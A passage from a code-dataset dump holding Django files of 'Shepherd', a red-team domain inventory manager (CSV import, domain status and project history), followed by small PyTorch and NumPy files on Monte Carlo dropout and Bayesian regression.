`csv_file` from the POSTed form data\n        csv_file = request.FILES['csv_file']\n        # Do a basic file extension check to see if this is a csv file\n        if not csv_file.name.endswith('.csv'):\n            messages.error(request, 'File is not CSV type')\n            return HttpResponseRedirect(reverse('upload_csv'))\n        # The file is loaded into memory, so this view must be aware of system limits\n        if csv_file.multiple_chunks():\n            messages.error(request, 'Uploaded file is too big (%.2f MB).' % (csv_file.size/(1000*1000),))\n            return HttpResponseRedirect(reverse('upload_csv'))\n    except Exception as e:\n        logging.getLogger('error_logger').error('Unable to upload/read file. ' + repr(e))\n        messages.error(request, 'Unable to upload/read file: ' + repr(e))\n        # The file is unusable at this point, so return to the upload page instead of falling through\n        return HttpResponseRedirect(reverse('upload_csv'))\n    # Loop over the lines and save the domains to the Domains model\n    try:\n        # Try to read the file data\n        csv_file_wrapper = StringIO(csv_file.read().decode())\n        csv_reader = csv.DictReader(csv_file_wrapper, delimiter=',')\n    except Exception as e:\n        logging.getLogger('error_logger').error('Unable to parse file. 
' + repr(e))\n messages.error(request, 'Unable to parse file: ' + repr(e))\n return HttpResponseRedirect(reverse('upload_csv'))\n try:\n # Process each csv row and commit it to the database\n for entry in csv_reader:\n logging.getLogger('error_logger').info(\"Adding %s to the database\", entry['name'])\n # Try to format dates into the format Django expects them, YYYY-MM-DD\n # This just catches the other common format, MM-DD-YYYY\n # Other date formats will be missed and the user will see an error message after it fails to commit\n try:\n entry['creation'] = datetime.datetime.strptime(entry['creation'], '%m-%d-%Y').strftime('%Y-%m-%d')\n except:\n pass\n try:\n entry['expiration'] = datetime.datetime.strptime(entry['expiration'], '%m-%d-%Y').strftime('%Y-%m-%d')\n except:\n pass\n # Try to resolve the user-defined health_status value or default to `Healthy`\n try:\n health_status = HealthStatus.objects.get(health_status__iexact=entry['domain_status'])\n except:\n health_status = HealthStatus.objects.get(health_status='Healthy')\n entry['health_status'] = health_status\n # Try to resolve the user-defined whois_status value or default to `Enabled` as it usually is\n try:\n whois_status = WhoisStatus.objects.get(whois_status__iexact=entry['whois_status'])\n except:\n whois_status = WhoisStatus.objects.get(whois_status='Enabled')\n entry['whois_status'] = whois_status\n # Check if the optional note field is in the csv and add it as NULL if not\n if not 'note' in entry:\n entry['note'] = None\n # Check if the domain_status Foreign Key is in the csv and try to resolve the status\n if 'domain_status' in entry:\n try:\n domain_status = DomainStatus.objects.get(domain_status__iexact=entry['domain_status'])\n except:\n domain_status = DomainStatus.objects.get(domain_status='Available')\n entry['domain_status'] = domain_status\n else:\n domain_status = DomainStatus.objects.get(domain_status='Available')\n entry['domain_status'] = domain_status\n # The last_used_by field will only be set by Shepherd at domain check-out\n if 'last_used_by' in entry:\n entry['last_used_by'] = None\n else:\n entry['last_used_by'] = None\n # Try to pass the dict object to the Domain model\n try:\n new_domain = Domain(**entry)\n new_domain.save()\n # If there is an error, store as string and then display\n except Exception as e:\n logging.getLogger('error_logger').error(repr(e))\n messages.error(request, 'Issue processing data for ' + repr(entry['name']) + ': ' + repr(e))\n return HttpResponseRedirect(reverse('upload_csv'))\n except Exception as e:\n logging.getLogger('error_logger').error('Unable to read rows: ' + repr(e))\n messages.error(request, 'Unable to read rows: ' + repr(e))\n return HttpResponseRedirect(reverse('upload_csv'))\n\n@login_required\ndef update(request):\n \"\"\"View function to display the control panel for updating domain information.\"\"\"\n # Check if the request is a POST and proceed with the task\n if request.method == 'POST':\n # Add an async task grouped as `Domain Updates`\n task_id = async_task('tasks.check_domains', group='Domain Updates', hook='tasks.send_slack_complete_msg')\n # Return to the update.html page with the confirmation message\n messages.success(request, 'Task ID {} has been successfully queued!'.format(task_id))\n return HttpResponseRedirect(reverse('update'))\n else:\n # Collect data for rendering the page\n total_domains = Domain.objects.all().count()\n try:\n sleep_time = settings.DOMAINCHECK_CONFIG['sleep_time']\n update_time = round(total_domains * sleep_time / 60, 2)\n 
except:\n sleep_time = 20\n update_time = round(total_domains * sleep_time / 60, 2)\n try:\n # Get the latest completed task from `Domain Updates`\n queryset = Task.objects.filter(group='Domain Updates')[0]\n # Get the task's start date and time\n last_update_requested = queryset.started\n # Get the task's completed time\n last_result = queryset.result\n # Check if the task was flagged as successful or failed\n if queryset.success:\n last_update_completed = queryset.stopped\n last_update_time = round(queryset.time_taken() / 60, 2)\n else:\n last_update_completed = 'Failed'\n last_update_time = ''\n except:\n last_update_requested = 'Never Successfully Run'\n last_update_completed = ''\n last_update_time = ''\n last_result = ''\n context = {\n 'total_domains': total_domains,\n 'update_time': update_time,\n 'last_update_requested': last_update_requested,\n 'last_update_completed': last_update_completed,\n 'last_update_time': last_update_time,\n 'last_result': last_result,\n 'sleep_time': sleep_time\n }\n return render(request, 'catalog/update.html', context=context)\n\n@login_required\ndef update_dns(request):\n \"\"\"View function to display the control panel for updating domain DNS records.\"\"\"\n # Check if the request is a POST and proceed with the task\n if request.method == 'POST':\n # Add an async task grouped as `DNS Updates`\n task_id = async_task('tasks.update_dns', group='DNS Updates', hook='tasks.send_slack_complete_msg')\n # Return to the update.html page with the success message\n messages.success(request, 'Task ID {} has been successfully queued!'.format(task_id))\n return HttpResponseRedirect(reverse('update_dns'))\n else:\n # Collect data for rendering the page\n try: \n queryset = Task.objects.filter(group='DNS Updates')[0]\n last_update_requested = queryset.started\n last_result = queryset.result\n if queryset.success:\n last_update_completed = queryset.stopped\n last_update_time = round(queryset.time_taken() / 60, 2)\n else:\n last_update_completed = 'Failed'\n last_update_time = ''\n except:\n last_update_requested = 'Never Successfully Run'\n last_update_completed = ''\n last_update_time = ''\n last_result = ''\n context = {\n 'last_update_requested': last_update_requested,\n 'last_update_completed': last_update_completed,\n 'last_update_time': last_update_time,\n 'last_result': last_result\n }\n return render(request, 'catalog/update_dns.html', context=context)\n\n@login_required\ndef management(request):\n \"\"\"View function to display the current settings configured for Shepherd.\"\"\"\n # Get the DOMAINCHECK_CONFIG dictionary from settings.py\n if settings.DOMAINCHECK_CONFIG:\n config = settings.DOMAINCHECK_CONFIG\n # Pass the relevant settings to management.html\n context = {\n 'virustotal_api_key': config['virustotal_api_key'],\n 'sleep_time': config['sleep_time']\n }\n return render(request, 'catalog/management.html', context=context)\n\n################\n# View Classes #\n################\n\nclass DomainListView(LoginRequiredMixin, generic.ListView):\n \"\"\"View showing all registered domains. 
This view defaults to the domain_list.html template.\"\"\"\n    model = Domain\n    paginate_by = 25\n\n    def get_queryset(self):\n        \"\"\"Customize the queryset based on search.\"\"\"\n        # Check if a search parameter is in the request\n        try:\n            search_term = self.request.GET.get('domain_search')\n        except:\n            search_term = ''\n        # If there is a search term, filter the query by domain name or category\n        # TODO: We might consider using keywords like `category:technology` to search different fields\n        if search_term:\n            queryset = super(DomainListView, self).get_queryset()\n            return queryset.filter(Q(name__icontains=search_term) | Q(all_cat__icontains=search_term)).order_by('name')\n        else:\n            return Domain.objects.all().order_by('domain_status')\n\n\nclass AvailDomainListView(LoginRequiredMixin, generic.ListView):\n    \"\"\"View showing only available domains. This view calls the available_domains.html template.\"\"\"\n    model = Domain\n    queryset = Domain.objects.filter(domain_status__domain_status='Available').order_by('name')\n    template_name = 'catalog/available_domains.html'\n    paginate_by = 25\n\n\nclass ActiveDomainListView(LoginRequiredMixin, generic.ListView):\n    \"\"\"View showing only active (unavailable) domains. This view calls the active_domains.html template.\"\"\"\n    model = Domain\n    queryset = Domain.objects.filter(domain_status__domain_status='Unavailable').order_by('name')\n    template_name = 'catalog/active_domains.html'\n    paginate_by = 25\n\n\nclass ResDomainListView(LoginRequiredMixin, generic.ListView):\n    \"\"\"View showing only reserved domains. This view calls the reserved_domains.html template.\"\"\"\n    model = Domain\n    queryset = Domain.objects.filter(domain_status__domain_status='Reserved').order_by('name')\n    template_name = 'catalog/reserved_domains.html'\n    paginate_by = 25\n\n\nclass GraveyardListView(LoginRequiredMixin, generic.ListView):\n    \"\"\"View showing only burned and retired domains. This view calls the graveyard.html template.\"\"\"\n    model = Domain\n    queryset = Domain.objects.filter(domain_status__domain_status='Burned')\n    template_name = 'catalog/graveyard.html'\n    paginate_by = 25\n\n\nclass DomainDetailView(LoginRequiredMixin, generic.DetailView):\n    \"\"\"View showing the details for the specified domain. This view defaults to the domain_detail.html\n    template.\n    \"\"\"\n    model = Domain\n\n\nclass ActiveDomainsByUserListView(LoginRequiredMixin, generic.ListView):\n    \"\"\"View showing only the domains checked-out by the current user. This view calls the\n    active_domains_user.html template.\n    \"\"\"\n    model = History\n    template_name = 'catalog/active_domains_user.html'\n    paginate_by = 25\n\n    def get_queryset(self):\n        \"\"\"Modify this built-in function to filter results from the History by the current user.\"\"\"\n        # Only return project entries for the current user where the current domain status is `Unavailable`\n        return History.objects.filter(operator=self.request.user,\n                                      domain__domain_status__domain_status='Unavailable',\n                                      end_date__gte=datetime.datetime.now()).order_by('end_date')\n\n\nclass HistoryCreate(LoginRequiredMixin, CreateView):\n    \"\"\"View for creating new project history entries. This view defaults to the\n    history_form.html template.\n    \"\"\"\n    model = History\n    fields = '__all__'\n    success_url = reverse_lazy('domains')\n\n    def get_initial(self):\n        \"\"\"Set the initial values for the form.\"\"\"\n        domain = get_object_or_404(Domain, pk=self.kwargs.get('pk'))\n        return {\n            'domain': domain,\n        }\n\n\nclass HistoryUpdate(LoginRequiredMixin, UpdateView):\n    \"\"\"View for updating existing project history entries. This view defaults to the\n    history_form.html template.\n    \"\"\"\n    model = History\n    fields = ['client', 'activity_type', 'project_type', 'end_date', 'note', 'operator']\n    success_url = reverse_lazy('domains')\n\n\nclass HistoryDelete(LoginRequiredMixin, DeleteView):\n    \"\"\"View for deleting existing project history entries. This view defaults to the\n    history_confirm_delete.html template.\n    \"\"\"\n    model = History\n    success_url = reverse_lazy('domains')\n\n\nclass DomainCreate(LoginRequiredMixin, CreateView):\n    \"\"\"View for creating new domain name entries. This view defaults to the\n    domain_form.html template.\n    \"\"\"\n    model = Domain\n    form_class = DomainCreateForm\n    success_url = reverse_lazy('domains')\n\n\nclass DomainUpdate(LoginRequiredMixin, UpdateView):\n    \"\"\"View for updating existing domain name entries. This view defaults to the\n    domain_form.html template.\n    \"\"\"\n    model = Domain\n    fields = '__all__'\n    success_url = reverse_lazy('domains')\n\n\nclass DomainDelete(LoginRequiredMixin, DeleteView):\n    \"\"\"View for deleting existing domain name entries. This view defaults to the\n    domain_confirm_delete.html template.\n    \"\"\"\n    model = Domain\n    success_url = reverse_lazy('domains')\n"
},
{
"alpha_fraction": 0.678742527961731,
"alphanum_fraction": 0.6844311356544495,
"avg_line_length": 49.099998474121094,
"blob_id": "7e936ed4e3a30775160b14c9761f1307f73802a7",
"content_id": "5870d7fa7fd5d5d6627d89bfc139fda445643acc",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10020,
"license_type": "permissive",
"max_line_length": 210,
"num_lines": 200,
"path": "/catalog/models.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "\"\"\"This contains all of the database models for the catalog application.\"\"\"\n\nfrom django.db import models\nfrom django.urls import reverse\nfrom django.contrib.auth.models import User\n\nimport datetime\nfrom datetime import date\n\n\nclass HealthStatus(models.Model):\n \"\"\"Model representing the available domain health settings.\"\"\"\n health_status = models.CharField(max_length=20, unique=True, help_text='Health status type (e.g. Healthy, Burned)')\n\n class Meta:\n \"\"\"Metadata for the model.\"\"\"\n ordering = ['health_status']\n verbose_name = 'Health status'\n verbose_name_plural = 'Health statuses'\n\n def __str__(self):\n \"\"\"String for representing the model object (in Admin site etc.).\"\"\"\n return self.health_status\n\n\nclass DomainStatus(models.Model):\n \"\"\"Model representing the available domain statuses.\"\"\"\n domain_status = models.CharField(max_length=20, unique=True, help_text='Domain status type (e.g. Available)')\n\n class Meta:\n \"\"\"Metadata for the model.\"\"\"\n ordering = ['domain_status']\n verbose_name = 'Domain status'\n verbose_name_plural = 'Domain statuses'\n\n def __str__(self):\n \"\"\"String for representing the model object (in Admin site etc.).\"\"\"\n return self.domain_status\n\n\nclass WhoisStatus(models.Model):\n \"\"\"Model representing the available WHOIS privacy statuses.\"\"\"\n whois_status = models.CharField(max_length=20, unique=True, help_text='WHOIS privacy status (e.g. Enabled, Disabled)')\n\n class Meta:\n \"\"\"Metadata for the model.\"\"\"\n ordering = ['whois_status']\n verbose_name = 'WHOIS status'\n verbose_name_plural = 'WHOIS statuses'\n\n def __str__(self):\n \"\"\"String for representing the model object (in Admin site etc.).\"\"\"\n return self.whois_status\n\n\nclass ActivityType(models.Model):\n \"\"\"Model representing the available domain activity types.\"\"\"\n activity = models.CharField(max_length=100, unique=True, help_text='Enter a reason for the use of the domain (e.g. command-and-control)')\n\n class Meta:\n \"\"\"Metadata for the model.\"\"\"\n ordering = ['activity']\n verbose_name = 'Domain activity'\n verbose_name_plural = 'Domain activities'\n\n def __str__(self):\n \"\"\"String for representing the model object (in Admin site etc.).\"\"\"\n return self.activity\n\n\nclass ProjectType(models.Model):\n \"\"\"Model representing the available project types.\"\"\"\n project_type = models.CharField('Project Type', max_length=100, unique=True, help_text='Enter a project type (e.g. red team, penetration test)')\n\n class Meta:\n \"\"\"Metadata for the model.\"\"\"\n ordering = ['project_type']\n verbose_name = 'Project type'\n verbose_name_plural = 'Project types'\n\n def __str__(self):\n \"\"\"String for representing the model object (in Admin site etc.).\"\"\"\n return self.project_type\n\n\nclass Client(models.Model):\n \"\"\"Model representing the clients attached to project records. This model tracks client\n information. 
Additional details can be added beyond the client's name, but it is likely\n    unnecessary for the catalog.\n    \"\"\"\n    name = models.CharField('Client Name', max_length=100, unique=True, help_text='Enter the name of the client')\n\n    class Meta:\n        \"\"\"Metadata for the model.\"\"\"\n        ordering = ['name']\n        verbose_name = 'Client'\n        verbose_name_plural = 'Clients'\n\n    def __str__(self):\n        \"\"\"String for representing the model object (in Admin site etc.).\"\"\"\n        return self.name\n\n\nclass Domain(models.Model):\n    \"\"\"Model representing the domains and related information. This is the primary model for the\n    catalog application. This model keeps a record of the domain name and the domain's health,\n    categories, and current status (e.g. Available).\n\n    The availability and health statuses are Foreign Keys.\n    \"\"\"\n    name = models.CharField('Name', max_length=100, unique=True, help_text='Enter a domain name')\n    registrar = models.CharField('Registrar', max_length=100, help_text='Enter the name of the registrar where this domain is registered', null=True, blank=True)\n    dns_record = models.CharField('DNS Record', max_length=500, help_text='Enter domain DNS records', null=True, blank=True)\n    health_dns = models.CharField('DNS Health', max_length=100, help_text='Domain health status based on passive DNS (e.g. Healthy, Burned)', null=True, blank=True)\n    creation = models.DateField('Purchase Date', help_text='Domain purchase date')\n    expiration = models.DateField('Expiration Date', help_text='Domain expiration date')\n    all_cat = models.TextField('All Categories', help_text='All categories applied to this domain', null=True, blank=True)\n    ibm_xforce_cat = models.CharField('IBM X-Force', max_length=100, help_text='Domain category as determined by IBM X-Force', null=True, blank=True)\n    talos_cat = models.CharField('Cisco Talos', max_length=100, help_text='Domain category as determined by Cisco Talos', null=True, blank=True)\n    bluecoat_cat = models.CharField('Bluecoat', max_length=100, help_text='Domain category as determined by Bluecoat', null=True, blank=True)\n    fortiguard_cat = models.CharField('Fortiguard', max_length=100, help_text='Domain category as determined by Fortiguard', null=True, blank=True)\n    opendns_cat = models.CharField('OpenDNS', max_length=100, help_text='Domain category as determined by OpenDNS', null=True, blank=True)\n    trendmicro_cat = models.CharField('TrendMicro', max_length=100, help_text='Domain category as determined by TrendMicro', null=True, blank=True)\n    mx_toolbox_status = models.CharField('MX Toolbox Status', max_length=100, help_text='Domain spam status as determined by MX Toolbox', null=True, blank=True)\n    note = models.TextField('Notes', help_text='Domain-related notes, such as thoughts behind its purchase or how/why it was burned or retired', null=True, blank=True)\n    burned_explanation = models.TextField('Health Explanation', help_text='Reasons why the domain\\'s health status is not \"Healthy\"', null=True, blank=True)\n    # Foreign Keys\n    whois_status = models.ForeignKey('WhoisStatus', on_delete=models.PROTECT, null=True, blank=True)\n    health_status = models.ForeignKey('HealthStatus', on_delete=models.PROTECT, null=True, blank=True)\n    domain_status = models.ForeignKey('DomainStatus', on_delete=models.PROTECT, null=True, blank=True)\n    last_used_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, blank=True)\n\n    class Meta:\n        \"\"\"Metadata for the model.\"\"\"\n        ordering = ['health_status', 'name']\n        permissions = (('can_retire_domain', 'Can retire a domain'), ('can_mark_reserved', 'Can reserve a domain'),)\n        verbose_name = 'Domain'\n        verbose_name_plural = 'Domains'\n\n    def get_absolute_url(self):\n        \"\"\"Returns the URL to access a particular instance of the model.\"\"\"\n        # Adds a \"View on Site\" button to the model's record editing screens in the Admin site\n        return reverse('domain-detail', args=[str(self.id)])\n\n    def get_domain_age(self):\n        \"\"\"Calculate the domain's age based on the current date and the domain's purchase date.\"\"\"\n        time_delta = datetime.date.today() - self.creation\n        return time_delta.days\n\n    @property\n    def get_list(self):\n        \"\"\"Property to enable fetching the list from the dns_record entry.\"\"\"\n        if self.dns_record:\n            return self.dns_record.split(' ::: ')\n        else:\n            return None\n\n    def __str__(self):\n        \"\"\"String for representing the model object (in Admin site etc.).\"\"\"\n        return f'{self.name} ({self.health_status})'\n\n\nclass History(models.Model):\n    \"\"\"Model representing the project history. This model records start and end dates for a project\n    and then uses Foreign Keys for linking the dates to a client, project type, activity type, and\n    domain.\n    \"\"\"\n    # This field is automatically filled with the current date at check-out\n    start_date = models.DateField('Start Date', auto_now_add=True, max_length=100, help_text='Enter the start date of the project')\n    end_date = models.DateField('End Date', max_length=100, help_text='Enter the end date of the project')\n    note = models.TextField('Notes', help_text='Project-related notes, such as how the domain will be used/how it worked out', null=True, blank=True)\n    slack_channel = models.CharField('Project Slack Channel', max_length=100, help_text='Name of the Slack channel to be used for updates for this domain during the project\\'s duration', null=True, blank=True)\n    # Foreign Keys\n    client = models.ForeignKey('Client', on_delete=models.CASCADE, null=False)\n    domain = models.ForeignKey('Domain', on_delete=models.CASCADE, null=False)\n    operator = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, blank=True)\n    project_type = models.ForeignKey('ProjectType', on_delete=models.PROTECT, null=False)\n    activity_type = models.ForeignKey('ActivityType', on_delete=models.PROTECT, null=False, blank=True)\n\n    class Meta:\n        \"\"\"Metadata for the model.\"\"\"\n        ordering = ['client', 'domain']\n        verbose_name = 'Historical project'\n        verbose_name_plural = 'Historical projects'\n\n    def get_absolute_url(self):\n        \"\"\"Returns the URL to access a particular instance of the model.\"\"\"\n        # Adds a \"View on Site\" button to the model's record editing screens in the Admin site\n        return reverse('history_update', args=[str(self.id)])\n\n    def __str__(self):\n        \"\"\"String for representing the model object (in Admin site etc.).\"\"\"\n        return f'{self.client} {self.project_type.project_type} - {self.domain.name} ({self.activity_type.activity}) {self.start_date} to {self.end_date} - {self.operator}'\n\n    @property\n    def is_overdue(self):\n        \"\"\"Property to test if the provided end date is in the past.\"\"\"\n        if self.start_date and date.today() > self.end_date:\n            return True\n        return False\n"
},
{
"alpha_fraction": 0.7445255517959595,
"alphanum_fraction": 0.7445255517959595,
"avg_line_length": 18.571428298950195,
"blob_id": "e79181b656e73b0b663ef34ff4ba443d40a5bdb9",
"content_id": "9a726c9412690e9d87fcffebb478fa321df3739e",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 137,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 7,
"path": "/catalog/apps.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "\"\"\"This defines the available applications.\"\"\"\n\nfrom django.apps import AppConfig\n\n\nclass CatalogConfig(AppConfig):\n name = 'catalog'\n"
}
] | 14 |
Mae317/Mae | https://github.com/Mae317/Mae | a5d4c0484a9c6dc6e02230c18d33283171f522db | a7ae1cb3caeab7684f8b5bb4bf97addcbe407325 | 22eb25fe7a1bda54ca745c7d3ca3266b5ca08822 | refs/heads/main | 2023-03-14T04:18:49.835163 | 2021-03-13T21:23:28 | 2021-03-13T21:23:28 | 347,472,250 | 0 | 0 | null | 2021-03-13T20:30:09 | 2021-03-13T20:46:07 | 2021-03-13T21:23:28 | Python | [
{
"alpha_fraction": 0.761904776096344,
"alphanum_fraction": 0.761904776096344,
"avg_line_length": 6,
"blob_id": "8ef4c239aff7d370ce1a5be3f413eb7758bbcdc0",
"content_id": "eb690e98c5b30a8593d9fb5beee0dabcba949d8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 21,
"license_type": "no_license",
"max_line_length": 8,
"num_lines": 3,
"path": "/README.md",
"repo_name": "Mae317/Mae",
"src_encoding": "UTF-8",
"text": "# Mae\nCoursera\nhello\n"
},
{
"alpha_fraction": 0.699999988079071,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 18,
"blob_id": "cba2a5ee71fb5ece2ff21a4e4c607044e1642cfa",
"content_id": "2c572ff3ccede0ff24b678bdf42bc9118fc1485c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 1,
"path": "/firstpython.py",
"repo_name": "Mae317/Mae",
"src_encoding": "UTF-8",
"text": "#disp;ay the input\n\n"
}
] | 2 |
makora9143/bayes_uncertainty | https://github.com/makora9143/bayes_uncertainty | d0dd07263a43a82cbcf3f2007c297afa831d6447 | 1f651fda9dbbb9004fc9b83744fd954ed6ad73a4 | a4f8123afccdfc8c79179ab0b3fdf26ff30a9f72 | refs/heads/master | 2020-03-12T14:33:52.448986 | 2018-04-30T09:20:42 | 2018-04-30T09:20:42 | 130,670,349 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.603225827217102,
"alphanum_fraction": 0.6174193620681763,
"avg_line_length": 38.74359130859375,
"blob_id": "6440576eb34f0bc107e8bed2ef29e67a7910d735",
"content_id": "37191b22c27a6234eae0c7a1b318cd18d2dab944",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3100,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 78,
"path": "/mcdp/layers/linear.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import math\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Function\n\nclass HeteroLinearFunction(Function):\n\n @staticmethod\n def forward(ctx, input, weight, bias=None):\n output = input.mm(weight.t())\n if bias is not None:\n output += bias.unsqueeze(0).expand_as(output)\n ctx.save_for_backward(input, weight, bias, output)\n return output\n\n @staticmethod\n def backward(ctx, grad_output):\n input, weight, bias, output = ctx.saved_tensors\n grad_input = grad_weight = grad_bias = None\n\n grad_output_mean = grad_output.index_select(1, torch.LongTensor([0]))\n prec = torch.exp(-output.index_select(1, torch.LongTensor([1])))\n weight_mean = weight.index_select(0, torch.LongTensor([0]))\n weight_sigma2 = weight.index_select(0, torch.LongTensor([1]))\n\n\n if ctx.needs_input_grad[0]:\n grad_input = (prec * grad_output_mean).mm(weight_mean)\n grad_input -= 0.5 * (prec * grad_output_mean ** 2 - 1).mm(weight_sigma2)\n if ctx.needs_input_grad[1]:\n grad_weight_mean = (prec * grad_output_mean).t().mm(input)\n grad_weight_sigma2 = - 0.5 * (prec * grad_output_mean ** 2).t().mm(input)\n grad_weight = torch.cat([grad_weight_mean, grad_weight_sigma2], 0)\n if bias is not None and ctx.needs_input_grad[2]:\n grad_bias_mean = (prec * grad_output_mean).sum(0)\n grad_bias_sigma2 = (- 0.5 * (prec * grad_output_mean ** 2 - 1)).sum(0)\n grad_bias = torch.cat([grad_bias_mean, grad_bias_sigma2])\n\n return grad_input, grad_weight, grad_bias\n\nclass HeteroLinear(nn.Module):\n def __init__(self, input_features, output_features, bias=True):\n super(HeteroLinear, self).__init__()\n self.input_features = input_features\n self.output_features = output_features\n\n self.weight = nn.Parameter(torch.Tensor(output_features, input_features))\n if bias:\n self.bias = nn.Parameter(torch.Tensor(output_features))\n else:\n self.register_parameter('bias', None)\n\n self.weight.data.normal_(0., 1./input_features)\n if bias is not None:\n self.bias.data.uniform_(-0.1, 0.1)\n\n def forward(self, input):\n # See the autograd section for explanation of what happens here.\n return HeteroLinearFunction.apply(input, self.weight, self.bias)\n\n def extra_repr(self):\n # (Optional)Set the extra information about this module. You can test\n # it by printing an object of this class.\n return 'in_features={}, out_features={}, bias={}'.format(\n self.input_features, self.output_features, self.bias is not None\n )\n\n\n\nclass GaussianLinear(nn.Linear):\n def __init__(self, in_features, out_features, l, bias=True):\n self.l = l\n super(GaussianLinear, self).__init__(in_features, out_features, bias=True)\n\n def reset_parameters(self):\n self.weight.data.normal_(0, 1./(self.l) ** 2)\n if self.bias is not None:\n self.bias.data.normal_(0, 1./(self.l) ** 2)\n"
},
{
"alpha_fraction": 0.5662996768951416,
"alphanum_fraction": 0.580181896686554,
"avg_line_length": 29.72058868408203,
"blob_id": "d57784e41e458c574a8ef341e236a8be65704bf2",
"content_id": "f2e2c1d31ba5834e9085002f05a8f0b7845b7d86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2089,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 68,
"path": "/mcdp/layers/dropout.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nfrom torch.autograd.function import InplaceFunction\nfrom torch.nn.modules.dropout import _DropoutNd\n\n\nclass MCDropoutFunction(InplaceFunction):\n @staticmethod\n def _make_noise(input):\n return input.new().resize_as_(input)\n\n @staticmethod\n def symbolic(g, input, p=0.5, train=False, inplace=False):\n # See Note [Export inplace]\n r, _ = g.op(\"Dropout\", input, ratio_f=p, is_test_i=not train, outputs=2)\n return r\n\n @classmethod\n def forward(cls, ctx, input, p=0.5, train=False, inplace=False):\n if p < 0 or p > 1:\n raise ValueError(\"dropout probability has to be between 0 and 1, \"\n \"but got {}\".format(p))\n ctx.p = p\n ctx.train = train\n ctx.inplace = inplace\n\n if ctx.inplace:\n ctx.mark_dirty(input)\n output = input\n else:\n output = input.clone()\n\n if ctx.p == 0 or not ctx.train:\n noise = cls._make_noise(output.narrow(0, 0, 1))\n noise.bernoulli_(1 - ctx.p).div_(1 - ctx.p)\n noise.expand_as(output)\n output.mul_(noise)\n return output\n\n ctx.noise = cls._make_noise(input)\n if ctx.p == 1:\n ctx.noise.fill_(0)\n else:\n ctx.noise.bernoulli_(1 - ctx.p).div_(1 - ctx.p)\n ctx.noise = ctx.noise.expand_as(input)\n output.mul_(ctx.noise)\n\n return output\n\n @staticmethod\n def backward(ctx, grad_output):\n if ctx.p > 0 and ctx.train:\n return grad_output * ctx.noise, None, None, None\n else:\n return grad_output, None, None, None\n\n\ndef mc_dropout(input, p=0.5, training=False, inplace=False):\n return MCDropoutFunction.apply(input, p, training, inplace )\n\n\nclass MCDropout(_DropoutNd):\n def __init__(self, p=0.5, inplace=False, sampling=100):\n super(MCDropout, self).__init__(p=0.5, inplace=False)\n \n def forward(self, input):\n output = mc_dropout(input, self.p, self.training, self.inplace)\n return output\n"
},
{
"alpha_fraction": 0.5394946336746216,
"alphanum_fraction": 0.5565672516822815,
"avg_line_length": 33.3203125,
"blob_id": "fba3a1c55f3c3e4f6fc672798057a57bc9e20378",
"content_id": "eaf4f98f49d8b61bc1d9eed0b0721a32537a1f71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4393,
"license_type": "no_license",
"max_line_length": 285,
"num_lines": 128,
"path": "/gpr.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as anime\n\nimport argparse\n\n\n\ndef create_dataset(N, M, data_range=(-1, 7), func=np.sin):\n xs = np.random.uniform(*data_range, N)\n ys = func(xs)\n\n ys = ys + np.random.randn(*ys.shape)\n\n features = convert_features(xs, M)\n\n return xs, ys, features\n\n\ndef convert_features(xs, M):\n features = np.concatenate([\n np.power(xs.reshape(-1, 1), i) for i in range(M)\n ],\n axis=1)\n return features\n\n# def convert_features(xs, M, means, var):\n# return - np.power(xs.reshape(-1, 1) - means, 2) / (2 * np.power(var, 2))\n\n\ndef posterior(observed_xs, ys, prior_mean, prior_var, noise_var):\n dim = prior_var.shape[0]\n\n posterior_var = np.zeros((dim, dim))\n\n posterior_mean = np.zeros((1, dim))\n\n for x, y in zip(observed_xs, ys):\n x = x.reshape(1, -1)\n posterior_var += np.dot(x.T, x)\n posterior_mean += y * x\n\n posterior_var = noise_var * posterior_var + prior_var\n\n posterior_mean = np.dot(noise_var * posterior_mean + np.dot(prior_mean, prior_var),\n np.linalg.inv(posterior_var))\n\n return posterior_mean, posterior_var\n\n\ndef predictive(xs, mean, var, noise_var):\n dim = var.shape[0]\n features = convert_features(xs, dim)\n\n mean_star = np.dot(features, mean.T).reshape(-1)\n \n var_star = np.diag(np.dot(np.dot(features, np.linalg.inv(var)), features.T))\n\n std_star = np.sqrt(var_star)\n return mean_star, mean_star - std_star, mean_star + std_star\n\n\ndef evidence(ys, priors, posteriors, noise_var):\n print(\"yn\",noise_var * np.sum(np.power(ys, 2)))\n print(\"const\", - np.log(noise_var) + np.log(2 * np.pi))\n print(\"prior\", np.dot(np.dot(priors[0], priors[1]), priors[0].T) - np.log(np.linalg.det(priors[1])))\n print(\"post\", - np.dot(np.dot(posteriors[0], posteriors[1]), posteriors[0].T))\n print(\"post_det\", + np.log(np.linalg.det(posteriors[1])))\n return -0.5 * (noise_var * np.sum(np.power(ys, 2)) - np.log(noise_var) + np.log(2 * np.pi) + np.dot(np.dot(priors[0], priors[1]), priors[0].T) - np.log(np.linalg.det(priors[1])) - np.dot(np.dot(posteriors[0], posteriors[1]), posteriors[0].T) + 